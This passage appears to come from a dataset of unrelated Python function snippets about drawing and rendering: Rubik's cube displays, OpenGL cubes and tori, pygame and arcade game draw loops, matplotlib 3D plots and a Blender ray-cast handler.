240), (480, 240)]],\n [[(280, 160), (320, 160), (360, 160)],\n [(280, 200), (320, 200), (360, 200)],\n [(280, 240), (320, 240), (360, 240)]],\n [[(40, 160), (80, 160), (120, 160)],\n [(40, 200), (80, 200), (120, 200)],\n [(40, 240), (80, 240), (120, 240)]],\n [[(160, 40), (200, 40), (240, 40)],\n [(160, 80), (200, 80), (240, 80)],\n [(160, 120), (200, 120), (240, 120)]],\n [[(160, 280), (200, 280), (240, 280)],\n [(160, 320), (200, 320), (240, 320)],\n [(160, 360), (200, 360), (240, 360)]]]\n self.cubeColor = {1: 'green', 2: 'blue', 3: 'red', 4: 'orange',\\\n 5: 'white', 6: 'yellow'}\n for x in range(6):\n for y in range(3):\n for z in range(3):\n pos = self.cubePos[x][y][z]\n color = self.cubeColor[self.cube.cube[x][y][z]]\n self.cv.create_rectangle(pos[0], pos[1], pos[0]+40, pos[1]+40,\n fill=color, width='2')", "def render(self):\n self.axial.Render()\n self.coronal.Render()\n self.sagittal.Render()\n #self.isosurface.Render()\n #self.rwi_pcp.Render()", "def drawLine3D(x0,y0,z0,x1,y1,z1):\n dislin.strt3d(x0,y0,z0)\n dislin.conn3d(x1,y1,z1)", "def drawCube(self):\r\n glBegin(GL_QUADS);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(-1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(1.0, 1.0, -1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n glVertex3f(1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(1.0, -1.0, 1.0);\r\n glTexCoord2f(0.0, 0.0);\r\n glVertex3f(-1.0, -1.0, -1.0);\r\n glTexCoord2f(1.0, 0.0);\r\n glVertex3f(-1.0, -1.0, 1.0);\r\n glTexCoord2f(1.0, 1.0);\r\n glVertex3f(-1.0, 1.0, 1.0);\r\n glTexCoord2f(0.0, 1.0);\r\n 
glVertex3f(-1.0, 1.0, -1.0);\r\n glEnd()", "def draw_3dbox(bbox, ax):\n ax.scatter(xs=bbox[:,0], ys=bbox[:,1], zs=bbox[:,2], marker='o')\n ax.plot(bbox[[0,1,5,4,0],0], bbox[[0,1,5,4,0],1], bbox[[0,1,5,4,0],2]) # front\n ax.plot(bbox[[2,3,7,6,2],0], bbox[[2,3,7,6,2],1], bbox[[2,3,7,6,2],2]) # back\n ax.plot(bbox[[0,3],0], bbox[[0,3],1], bbox[[0,3],2])\n ax.plot(bbox[[1,2],0], bbox[[1,2],1], bbox[[1,2],2])\n ax.plot(bbox[[4,7],0], bbox[[4,7],1], bbox[[4,7],2])\n ax.plot(bbox[[5,6],0], bbox[[5,6],1], bbox[[5,6],2])", "def map_face(self):\n #Array Order: U0,D1,R2,L3,F4,B5,\n \n cube_list = []\n cube_list = self.cube.definition()\n \n for index, cubit in enumerate(self.faces['Up']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index]])\n for index, cubit in enumerate(self.faces['Ri']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+9]])\n for index, cubit in enumerate(self.faces['Ft']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+18]])\n for index, cubit in enumerate(self.faces['Dn']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+27]])\n for index, cubit in enumerate(self.faces['Le']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+36]])\n for index, cubit in enumerate(self.faces['Bk']):\n self.canvas.itemconfig(cubit,fill=self.face_colours[cube_list[index+45]])", "def draw(self, surface):\n for box in self.checkboxes:\n box.draw(surface)", "def on_draw(self):\r\n\r\n \r\n # clear the screen to begin drawing\r\n arcade.start_render()\r\n\r\n background = arcade.load_texture(\"gala.png\")\r\n arcade.draw_texture_rectangle(SCREEN_WIDTH/2, SCREEN_HEIGHT/2,SCREEN_WIDTH , SCREEN_HEIGHT, background) \r\n \r\n\r\n for asteriod in self.rocks:\r\n asteriod.draw()\r\n \r\n # for asteriod in self.rockss:\r\n # asteriod.draw()\r\n\r\n # for asteriod in self.rocksss:\r\n # asteriod.draw() \r\n \r\n for bullet in self.bullets:\r\n bullet.draw()\r\n \r\n \r\n self.ship.draw()\r\n \r\n \r\n # TODO: draw each object\r", "def draw(self, view):\n for r in self._aliens:\n for alien in r:\n if alien != None:\n alien.draw(view)\n if self._ship != None:\n self._ship.draw(view)\n self._dline.draw(view)\n for bolt in self._bolts:\n bolt.draw(view)", "def draw_cube(self, window):\n size = pygame.display.get_surface().get_size()\n width = (size[0]/4)\n\n window.fill((000,000,000))\n\n self.draw_face(\"U\", window, (0 + (width*1), 0 + (width*0)), width)\n self.draw_face(\"L\", window, (0 + (width*0), 0 + (width*1)), width)\n self.draw_face(\"F\", window, (0 + (width*1) * 1, 0 + (width*1)), width)\n self.draw_face(\"R\", window, (0 + (width*2), 0 + (width*1)), width)\n self.draw_face(\"B\", window, (0 + (width*3), 0 + (width*1)), width)\n self.draw_face(\"D\", window, (0 + (width*1), 0 + (width*2)), width)\n\n pygame.display.update()", "def draw(self):\n for obj in self.objects:\n obj.draw()", "def render_solid_3d(self, **kwds):\n return sum([ polygon3d(self.coordinates_of(f), **kwds) \n for f in self.polygons ])", "def drawBolts(self,view):\r\n for bolt in self.getBolts():\r\n bolt.draw(view)", "def render(self, scene):\n if self.degenerate:\n return\n # The number of subdivisions around the hoop's radial direction.\n if self.thickness:\n band_coverage = scene.pixel_coverage(self.pos, self.thickness)\n else:\n band_coverage = scene.pixel_coverage(self.pos, self.radius * 0.1)\n if band_coverage < 0:\n band_coverage = 1000\n bands = sqrt(band_coverage * 4.0)\n bands = clamp(4, bands, 40)\n # The number of 
subdivisions around the hoop's tangential direction.\n ring_coverage = scene.pixel_coverage(self.pos, self.radius)\n if ring_coverage < 0:\n ring_coverage = 1000\n rings = sqrt(ring_coverage * 4.0)\n rings = clamp(4, rings, 80)\n slices = int(rings)\n inner_slices = int(bands)\n radius = self.radius\n inner_radius = self.thickness\n\n # Create the vertex and normal arrays.\n vertices = []\n normals = []\n\n outer_angle_step = 2 * pi / (slices - 1)\n inner_angle_step = 2 * pi / (inner_slices - 1)\n outer_angle = 0.\n for i in range(slices):\n cos_outer_angle = cos(outer_angle)\n sin_outer_angle = sin(outer_angle)\n inner_angle = 0.\n for j in range(inner_slices):\n cos_inner_angle = cos(inner_angle)\n sin_inner_angle = sin(inner_angle)\n\n diameter = (radius + inner_radius * cos_inner_angle)\n vertex_x = diameter * cos_outer_angle\n vertex_y = diameter * sin_outer_angle\n vertex_z = inner_radius * sin_inner_angle\n\n normal_x = cos_outer_angle * cos_inner_angle\n normal_y = sin_outer_angle * cos_inner_angle\n normal_z = sin_inner_angle\n\n vertices.extend([vertex_x, vertex_y, vertex_z])\n normals.extend([normal_x, normal_y, normal_z])\n inner_angle += inner_angle_step\n outer_angle += outer_angle_step\n\n # Create ctypes arrays of the lists\n vertices = (gl.GLfloat *len(vertices))(*vertices)\n normals = (gl.GLfloat * len(normals))(*normals)\n\n # Create a list of triangle indices.\n indices = []\n for i in range(slices - 1):\n for j in range(inner_slices - 1):\n pos = i * inner_slices + j\n indices.extend([pos, pos + inner_slices, pos + inner_slices +\n 1])\n indices.extend([pos, pos + inner_slices + 1, pos + 1])\n indices = (gl.GLuint * len(indices))(*indices)\n\n # Compile a display list\n self.list = gl.glGenLists(1)\n gl.glNewList(self.list, gl.GL_COMPILE)\n self.color.gl_set(self.opacity)\n\n gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT)\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n self.model_world_transform(scene.gcf,\n Vector([self.radius, self.radius,\n self.radius])).gl_mult()\n\n gl.glVertexPointer(3, gl.GL_FLOAT, 0, vertices)\n gl.glNormalPointer(gl.GL_FLOAT, 0, normals)\n gl.glDrawElements(gl.GL_TRIANGLES, len(indices), gl.GL_UNSIGNED_INT,\n indices)\n gl.glPopClientAttrib()\n\n gl.glEndList()\n gl.glCallList(self.list)", "def draw(self, screen):\n for branch_points in self.branches:\n pygame.draw.polygon(screen, self.branch_color, branch_points)\n for bottom_points in self.bottom:\n pygame.draw.polygon(screen, self.bottom_color, bottom_points)", "def render_bounding_box_3d(\n self,\n boxes3d,\n extrinsics=Pose(),\n colors=(GREEN, ),\n side_color_fraction=0.7,\n rear_color_fraction=0.5,\n texts=None,\n line_thickness=3,\n font_scale=0.5,\n ):\n if len(colors) == 1:\n colors = list(colors) * len(boxes3d)\n\n combined_transform = self._bev_rotation * extrinsics\n\n boxes_corners = boxes3d.corners.cpu().numpy()\n\n # Draw cuboids\n for bidx, (corners, color) in enumerate(zip(boxes_corners, colors)):\n # Create 3 versions of colors for face coding.\n front_face_color = color\n side_line_color = [int(side_color_fraction * c) for c in color]\n rear_face_color = [int(rear_color_fraction * c) for c in color]\n\n # Do orthogonal projection and bring into pixel coordinate space\n # corners = bbox.corners\n corners_in_bev = combined_transform * corners\n corners2d = corners_in_bev[[0, 1, 5, 4], :2] # top surface of cuboid\n\n # Compute the center and offset of the corners\n corners2d[:, 0] = (self._center_pixel[0] + corners2d[:, 0] * 
self._pixels_per_meter)\n corners2d[:, 1] = (self._center_pixel[1] + corners2d[:, 1] * self._pixels_per_meter)\n\n center = np.mean(corners2d, axis=0).astype(np.int32)\n corners2d = corners2d.astype(np.int32)\n\n # Draw a line connecting center and font side.\n clr = WHITE if np.mean(self._bg_clr) < 128. else DARKGRAY\n cv2.line(\n self.data, tuple(center), (\n (corners2d[0][0] + corners2d[1][0]) // 2,\n (corners2d[0][1] + corners2d[1][1]) // 2,\n ), clr, 2\n )\n\n # Draw front face, side faces and back face\n cv2.line(self.data, tuple(corners2d[0]), tuple(corners2d[1]), front_face_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[1]), tuple(corners2d[2]), side_line_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[2]), tuple(corners2d[3]), rear_face_color, line_thickness)\n cv2.line(self.data, tuple(corners2d[3]), tuple(corners2d[0]), side_line_color, line_thickness)\n\n if texts:\n top_left = np.argmin(np.linalg.norm(corners2d, axis=1))\n cv2.putText(\n self.data, texts[bidx], tuple(corners2d[top_left]), cv2.FONT_HERSHEY_SIMPLEX, font_scale, WHITE,\n line_thickness // 2, cv2.LINE_AA\n )", "def plot3D(x):\n cycol = cycle('bgrcmk')\n fig = plt.figure()\n ax = Axes3D(fig)\n for i in range(5):\n ax.scatter(x[:, i, 0], x[:, i, 1], x[:, i, 2], c=next(cycol),\n marker='.')\n plt.show()", "def draw_cube(self, points, color=(255, 0, 0)):\n\n # draw front\n self.draw_line(points[0], points[1], color)\n self.draw_line(points[1], points[2], color)\n self.draw_line(points[3], points[2], color)\n self.draw_line(points[3], points[0], color)\n\n # draw back\n self.draw_line(points[4], points[5], color)\n self.draw_line(points[6], points[5], color)\n self.draw_line(points[6], points[7], color)\n self.draw_line(points[4], points[7], color)\n\n # draw sides\n self.draw_line(points[0], points[4], color)\n self.draw_line(points[7], points[3], color)\n self.draw_line(points[5], points[1], color)\n self.draw_line(points[2], points[6], color)\n\n # draw dots\n self.draw_dot(points[0], point_color=color, point_radius=4)\n self.draw_dot(points[1], point_color=color, point_radius=4)\n\n # draw x on the top\n self.draw_line(points[0], points[5], color)\n self.draw_line(points[1], points[4], color)", "def draw_ground():\n for i in range(3):\n groundturtle.forward(1450)\n groundturtle.left(90)\n groundturtle.forward(25)\n groundturtle.left(90)\n groundturtle.forward(1450)\n groundturtle.right(90)\n groundturtle.forward(25)\n groundturtle.right(90)", "def draw_cube(self, vec):\n # TOP FACE\n gl.glBegin(gl.GL_QUADS)\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n # BOTTOM FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n # FRONT FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n # BACK FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0] 
+ self.spacer, vec[1], vec[2])\n # RIGHT FACE\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2] + \\\n self.spacer)\n gl.glVertex3f(vec[0] + self.spacer, vec[1] + self.spacer, vec[2])\n gl.glVertex3f(vec[0] + self.spacer, vec[1], vec[2])\n # LEFT FACE\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2] + self.spacer)\n gl.glVertex3f(vec[0], vec[1], vec[2])\n gl.glVertex3f(vec[0], vec[1] + self.spacer, vec[2])\n gl.glEnd()", "def plot_surface(self):\n X, Y = np.meshgrid(self.x, self.y)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(X=X, Y=Y, Z=self.z)\n plt.show()", "def _draw3djoints(ax, annots, links, alpha=1):\n colors = ['r', 'm', 'b', 'c', 'g']\n for finger_idx, finger_links in enumerate(links):\n for idx in range(len(finger_links) - 1):\n _draw3dseg(\n ax,\n annots,\n finger_links[idx],\n finger_links[idx + 1],\n c=colors[finger_idx],\n alpha=alpha)", "def main(context, event):\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n for reg in area.regions:\n if reg.type == 'WINDOW':\n region = reg\n for space in area.spaces:\n if space.type == 'VIEW_3D':\n if hasattr(space, 'region_3d'):\n rv3d = space.region_3d\n \n user32 = windll.user32\n screensize = user32.GetSystemMetrics(78), user32.GetSystemMetrics(79)\n \n X= region.x\n Y= region.y\n top = screensize[1]\n\n win_x = bpy.context.window_manager.windows[0].x\n win_y = bpy.context.window_manager.windows[0].y\n\n flipped = top - (event['y'] + Y + win_y)\n \n coord = (event['x'] - win_x - X, flipped)\n\n view3d_utils.region_2d_to_location_3d\n \n view_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, coord)\n ray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, coord)\n ray_target = ray_origin + view_vector\n \n guide = create_giude()\n\n def visible_objects_and_duplis():\n \"\"\"Loop over (object, matrix) pairs (mesh only)\"\"\"\n\n for obj in context.visible_objects:\n if obj.type == 'MESH':\n if obj.modeling_cloth: \n yield (obj, obj.matrix_world.copy())\n\n def obj_ray_cast(obj, matrix):\n \"\"\"Wrapper for ray casting that moves the ray into object space\"\"\"\n\n # get the ray relative to the object\n matrix_inv = matrix.inverted()\n ray_origin_obj = matrix_inv * ray_origin\n ray_target_obj = matrix_inv * ray_target\n ray_direction_obj = ray_target_obj - ray_origin_obj\n\n # cast the ray\n success, location, normal, face_index = obj.ray_cast(ray_origin_obj, ray_direction_obj)\n\n if success:\n return location, normal, face_index\n else:\n return None, None, None\n\n # cast rays and find the closest object\n best_length_squared = -1.0\n best_obj = None\n for obj, matrix in visible_objects_and_duplis():\n hit, normal, face_index = obj_ray_cast(obj, matrix)\n if hit is not None:\n hit_world = matrix * hit\n vidx = [v for v in obj.data.polygons[face_index].vertices]\n verts = np.array([matrix * obj.data.shape_keys.key_blocks['modeling cloth key'].data[v].co for v in obj.data.polygons[face_index].vertices])\n vecs = verts - np.array(hit_world)\n closest = vidx[np.argmin(np.einsum('ij,ij->i', vecs, vecs))]\n length_squared = (hit_world - ray_origin).length_squared\n if best_obj is None or length_squared < best_length_squared:\n best_length_squared = length_squared\n best_obj = obj\n guide.location = matrix * obj.data.shape_keys.key_blocks['modeling cloth key'].data[closest].co\n extra_data['latest_hit'] = matrix * 
obj.data.shape_keys.key_blocks['modeling cloth key'].data[closest].co\n extra_data['name'] = obj.name\n extra_data['obj'] = obj\n extra_data['closest'] = closest\n \n if extra_data['just_clicked']:\n extra_data['just_clicked'] = False\n best_length_squared = length_squared\n best_obj = obj", "def draw(self):\n self.screen.fill(pygame.Color(0,0,0))\n for brick in self.model.bricks:\n pygame.draw.rect(self.screen, brick.color, pygame.Rect(brick.x,brick.y,brick.width,brick.height))\n pygame.draw.rect(self.screen, pygame.Color(255,255,255), pygame.Rect(self.model.paddle.x,self.model.paddle.y,self.model.paddle.width,self.model.paddle.height))\n pygame.draw.ellipse(self.screen, pygame.Color(128,128,128),(self.model.ball.x-self.model.ball.r, self.model.ball.y-self.model.ball.r, 2*self.model.ball.r,2*self.model.ball.r))\n pygame.display.update()", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def wireframe(self, projection_type, canvas_dimensions):\n # Configure viewportself.screen_dimensions = {\n self.screen_dimensions = {\n \"width\": canvas_dimensions['width'],\n \"height\": canvas_dimensions['height']\n }\n\n self.projection.viewport = self.screen_dimensions\n self.projection.projection_type = projection_type\n self.projection.camera = self.cameras[0]\n self.projection.region_width = self.screen_dimensions.get('width')\n self.projection.region_height = self.screen_dimensions.get('height')\n\n # Draw polygons for each object\n projected_objects = []\n for obj in self.objects:\n print('Rendering: ', obj)\n\n world_transformation = obj.translate(\n obj.rotate(obj.scale(obj.vertices))\n )\n camera_transformation = obj.rotate(\n obj.translate(world_transformation, np.array(\n [\n -self.projection.camera.translation[0],\n -self.projection.camera.translation[1],\n -self.projection.camera.translation[2]\n ]\n )), np.array(\n [\n -self.projection.camera.rotation[0],\n -self.projection.camera.rotation[1],\n -self.projection.camera.rotation[2]\n ]\n \n )\n )\n projected_view = self.projection.project_all(camera_transformation)\n normalized_view = obj.normalize(\n projected_view, self.projection.viewport\n )\n projected_faces = []\n for face in obj.faces:\n poly = []\n for vertex_index in face:\n poly.append(\n [\n int(normalized_view[vertex_index][0]),\n int(normalized_view[vertex_index][1]),\n int(camera_transformation[vertex_index][2])\n ]\n )\n projected_faces.append(poly)\n center = list(obj.calculate_center(normalized_view))\n vertices = [ [int(p[0]), int(p[1]), int(p[2])] for p in normalized_view]\n # print('calculated_center: ', center)\n # print(''vertices)\n projected_objects.append({\n 'vertices': vertices,\n 'faces': obj.clip(self.projection.camera.translation, projected_faces),\n 'center': [ int(coord) for coord in obj.calculate_center(normalized_view) ],\n })\n print(projected_objects[0]['faces'][:20])\n return projected_objects", "def drawAll(self):\r\n for x in range(len(self.model)):\r\n self.model[x].draw()", "def draw_objects(self, view_manager):\n raise NotImplementedError(\"draw_objects can not be called directly from recoBase3D\")", "def GUI_Cube(self,canvas,XYS):\n X,Y,S = XYS\n cUp = [];cFt = [];cDn = [];cBk = [];cRi = [];cLe = []\n cUp_xi=[S + X+S*i for i in range(3)]\n 
cUp_yi=[Y+S*i for i in range(3)]\n cFt_xi=[S + X+S*i for i in range(3)]\n cFt_yi=[4*S+Y+S*i for i in range(3)]\n cLe_xi=[X+S*i-3*S for i in range(3)]\n cLe_yi=[4*S+Y+S*i for i in range(3)]\n cRi_xi=[X+S*i+5*S for i in range(3)]\n cRi_yi=[4*S+Y+S*i for i in range(3)]\n cDn_xi=[S + X+S*i for i in range(3)]\n cDn_yi=[2*S+2*3*S+Y+S*i for i in range(3)]\n cBk_xi=[X+S*i+9*S for i in range(3)]\n cBk_yi=[4*S+Y+S*i for i in range(3)]\n\n x=0\n for j in range(3):\n for i in range(3):\n cUp.append(canvas.create_rectangle(cUp_xi[i],cUp_yi[j],cUp_xi[i]+S,cUp_yi[j]+S,fill='white',tags = ('Up',x+0)))\n cFt.append(canvas.create_rectangle(cFt_xi[i],cFt_yi[j],cFt_xi[i]+S,cFt_yi[j]+S,fill='green',tags = ('Ft',x+18)))\n cDn.append(canvas.create_rectangle(cDn_xi[i],cDn_yi[j],cDn_xi[i]+S,cDn_yi[j]+S,fill='yellow',tags = ('Dn',x+27))) \n cBk.append(canvas.create_rectangle(cBk_xi[i],cBk_yi[j],cBk_xi[i]+S,cBk_yi[j]+S,fill='blue',tags = ('Bk',x+45)))\n cRi.append(canvas.create_rectangle(cRi_xi[i],cRi_yi[j],cRi_xi[i]+S,cRi_yi[j]+S,fill='red',tags = ('Ri',x+9)))\n cLe.append(canvas.create_rectangle(cLe_xi[i],cLe_yi[j],cLe_xi[i]+S,cLe_yi[j]+S,fill='orange',tags = ('Le',x+36))) \n x+=1\n\n return {'Up':cUp,'Dn':cDn,'Ri':cRi,'Le':cLe,'Ft':cFt,'Bk':cBk}", "def _pre_draw_bge(self):\r\n self._pre_draw_common()\r\n # draw rays\r\n self._drawRays()", "def __generate_shadows(self):\n glEnable(GL_POLYGON_OFFSET_FILL)\n glPolygonOffset(3, 0)\n self.__sh.change_shader(vertex=1, fragment=1)\n\n light = self.__face.directed_light_cartesian\n self.__light_matrix = self.__get_rotation_matrix(\n (light[0], light[1], -light[2]), 2.0)\n\n glDisable(GL_CULL_FACE)\n self.__prepare_shaders(self.__model_matrix, self.__light_matrix, True)\n self.__sh.bind_fbo()\n glClear(GL_DEPTH_BUFFER_BIT)\n glDrawElements(GL_TRIANGLES, View.__triangles.size,\n GL_UNSIGNED_SHORT, View.__triangles)\n glFinish()\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n self.__sh.clear()", "def draw(self, view):\n for i in self.get_aliens():\n for n in i:\n if not n is None:\n n.draw(view)\n self.get_ship().draw(view)\n self.get_ship().get_linevalue().draw(view)\n for i in self.get_PU():\n i.draw(view)\n for i in self.get_bolts():\n i.draw(view)", "def drawShapes(self):\n self.draw_polygon(self.poly3.get_points() , color = \"#000\")\n self.draw_polygon(self.poly2.get_points() , color = \"#000\")\n self.draw_polygon(self.poly1.get_points() , color = \"#000\")\n self.draw_rect(0, 0, self.width, self.height, color= \"#000\")\n \"\"\"These statements are used to determine if a point is inside any of the\n 3 polygons and if so changes the point's color\"\"\"\n if (self.poly2.point_inside_polygon(self.p1) or self.poly1.point_inside_polygon(self.p1)\n or self.poly3.point_inside_polygon(self.p1)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p1.x, self.p1.y, 7, 7, color)\n\n if (self.poly2.point_inside_polygon(self.p2) or self.poly1.point_inside_polygon(self.p2)\n or self.poly3.point_inside_polygon(self.p2)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p2.x, self.p2.y, 7, 7, color)\n if (self.poly2.point_inside_polygon(self.p3) or self.poly1.point_inside_polygon(self.p3)\n or self.poly3.point_inside_polygon(self.p3)):\n color = \"#0F0\"\n else:\n color = \"#F00\"\n self.fill_oval(self.p3.x, self.p3.y, 7, 7, color)", "def unit_circle_anim( ):\n\n pixels_per_unit = 200 \n\n fr_cnt = 0\n for theta in range(1,360,1):\n \n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(pixels_per_unit)\n\n # print('THETA IS ', theta )\n\n x = 
math.cos(mu.dtr( theta) ) \n y = math.sin(mu.dtr( theta) ) \n\n hypot = vec3(x,y,0)\n adaj = vec3(x,0,0)\n oppos = vec3(0,y,0)\n \n #form the 3 vectors of the right triangle \n obj = object3d() \n obj.one_vec_to_obj(hypot)\n obj.one_vec_to_obj(adaj)\n obj.one_vec_to_obj(oppos, adaj)\n\n #put a cube at the current theta angle \n obj.prim_cube(pos=(x, y, 0), size=.05,linecolor=(255,0,0),rot=(0,0,0),pivot='world')\n\n\n #calculate the points between 1 and theta to form a circle \n dots = []\n for dot in range(1,theta,1):\n xx = math.cos(mu.dtr( dot) ) \n yy = math.sin(mu.dtr( dot) ) \n dots.append( (xx,yy) ) \n bloody_simple_2drender('unit_circle_%s.png'%fr_cnt, pts=dots, gridsize=pixels_per_unit, pfb=fb)\n\n\n #draw the OBJ file forming a right triangle \n bloody_simple_2drender('unit_circle_%s.png'%fr_cnt, obj=[obj], gridsize=pixels_per_unit, pfb=fb)\n fb.save( 'unit_circle_%s.png'%fr_cnt )\n fr_cnt += 1", "def draw(self):\n self.screen.fill((0,51,102))\n # get the new drawables\n self.drawables = (self.game_model.get_background_drawables()\n + self.game_model.get_plane_drawables()\n + self.game_model.get_bullet_drawables()\n + self.game_model.get_enemy_drawables())\n for d in self.drawables:\n rect = d.get_rect()\n surf = d.get_surface()\n surf.set_colorkey((255,255,255))\n self.screen.blit(surf, rect)", "def plot3D(self, diaphragmpoints=None, lungpoints=None, fig=None, ax=None, diaphragmcolor='r', lungcolor='g', size=2, howplot=0, dots=0):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n\n if diaphragmpoints is not None and lungpoints is not None:\n points = diaphragmpoints + lungpoints\n elif diaphragmpoints is not None:\n points = diaphragmpoints\n elif lungpoints is not None:\n points = lungpoints\n\n xpts, ypts, zpts = list(), list(), list()\n for i in range(len(points)):\n xpts.append(points[i][0])\n ypts.append(points[i][1])\n zpts.append(points[i][2])\n\n X = np.asarray(xpts)\n Y = np.asarray(ypts)\n Z = np.asarray(zpts)\n\n if howplot == 'wireframe':\n xpts, ypts, zpts = list(), list(), list()\n for i in range(len(pts)):\n xpts.append(pts[i][0])\n ypts.append(pts[i][1])\n zpts.append(pts[i][2])\n\n X = np.asarray([xpts])\n Y = np.asarray([ypts])\n Z = np.asarray([zpts])\n\n if dots == 1:\n ax.scatter(X, Y, Z, s=size, c='r', marker='o')\n\n ax.plot_wireframe(X, Y, Z)\n elif howplot == 1:\n ax.scatter(X, Y, Z, s=size, c=diaphragmcolor, marker='o')\n else:\n ax.scatter(X, Y, Z, s=size, c=diaphragmcolor, marker='o')\n ax.plot_trisurf(X, Y, Z, linewidth=0.2, antialiased=True)\n\n # Create cubic bounding box to simulate equal aspect ratio\n max_range = np.array([X.max() - X.min(), Y.max() - Y.min(), Z.max() - Z.min()]).max()\n Xb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][0].flatten() + 0.5 * (X.max() + X.min())\n Yb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][1].flatten() + 0.5 * (Y.max() + Y.min())\n Zb = 0.5 * max_range * np.mgrid[-1:2:2, -1:2:2, -1:2:2][2].flatten() + 0.5 * (Z.max() + Z.min())\n\n # Comment or uncomment following both lines to test the fake bounding box:\n for xb, yb, zb in zip(Xb, Yb, Zb):\n ax.plot([xb], [yb], [zb], 'w')\n\n plt.show()\n # fig.savefig('{}/diaphragm/{}.png'.format(DIR_RESULT))", "def enable3D(self):\r\n if(self.dataController.fileLoaded==True):\r\n self.dataController.toggleInteractiveMode()\r\n\r\n self.midsagittalView = False\r\n self.frontView = False\r\n self.topView = False\r\n self.bottomView = False\r\n self.threeDView = True", 
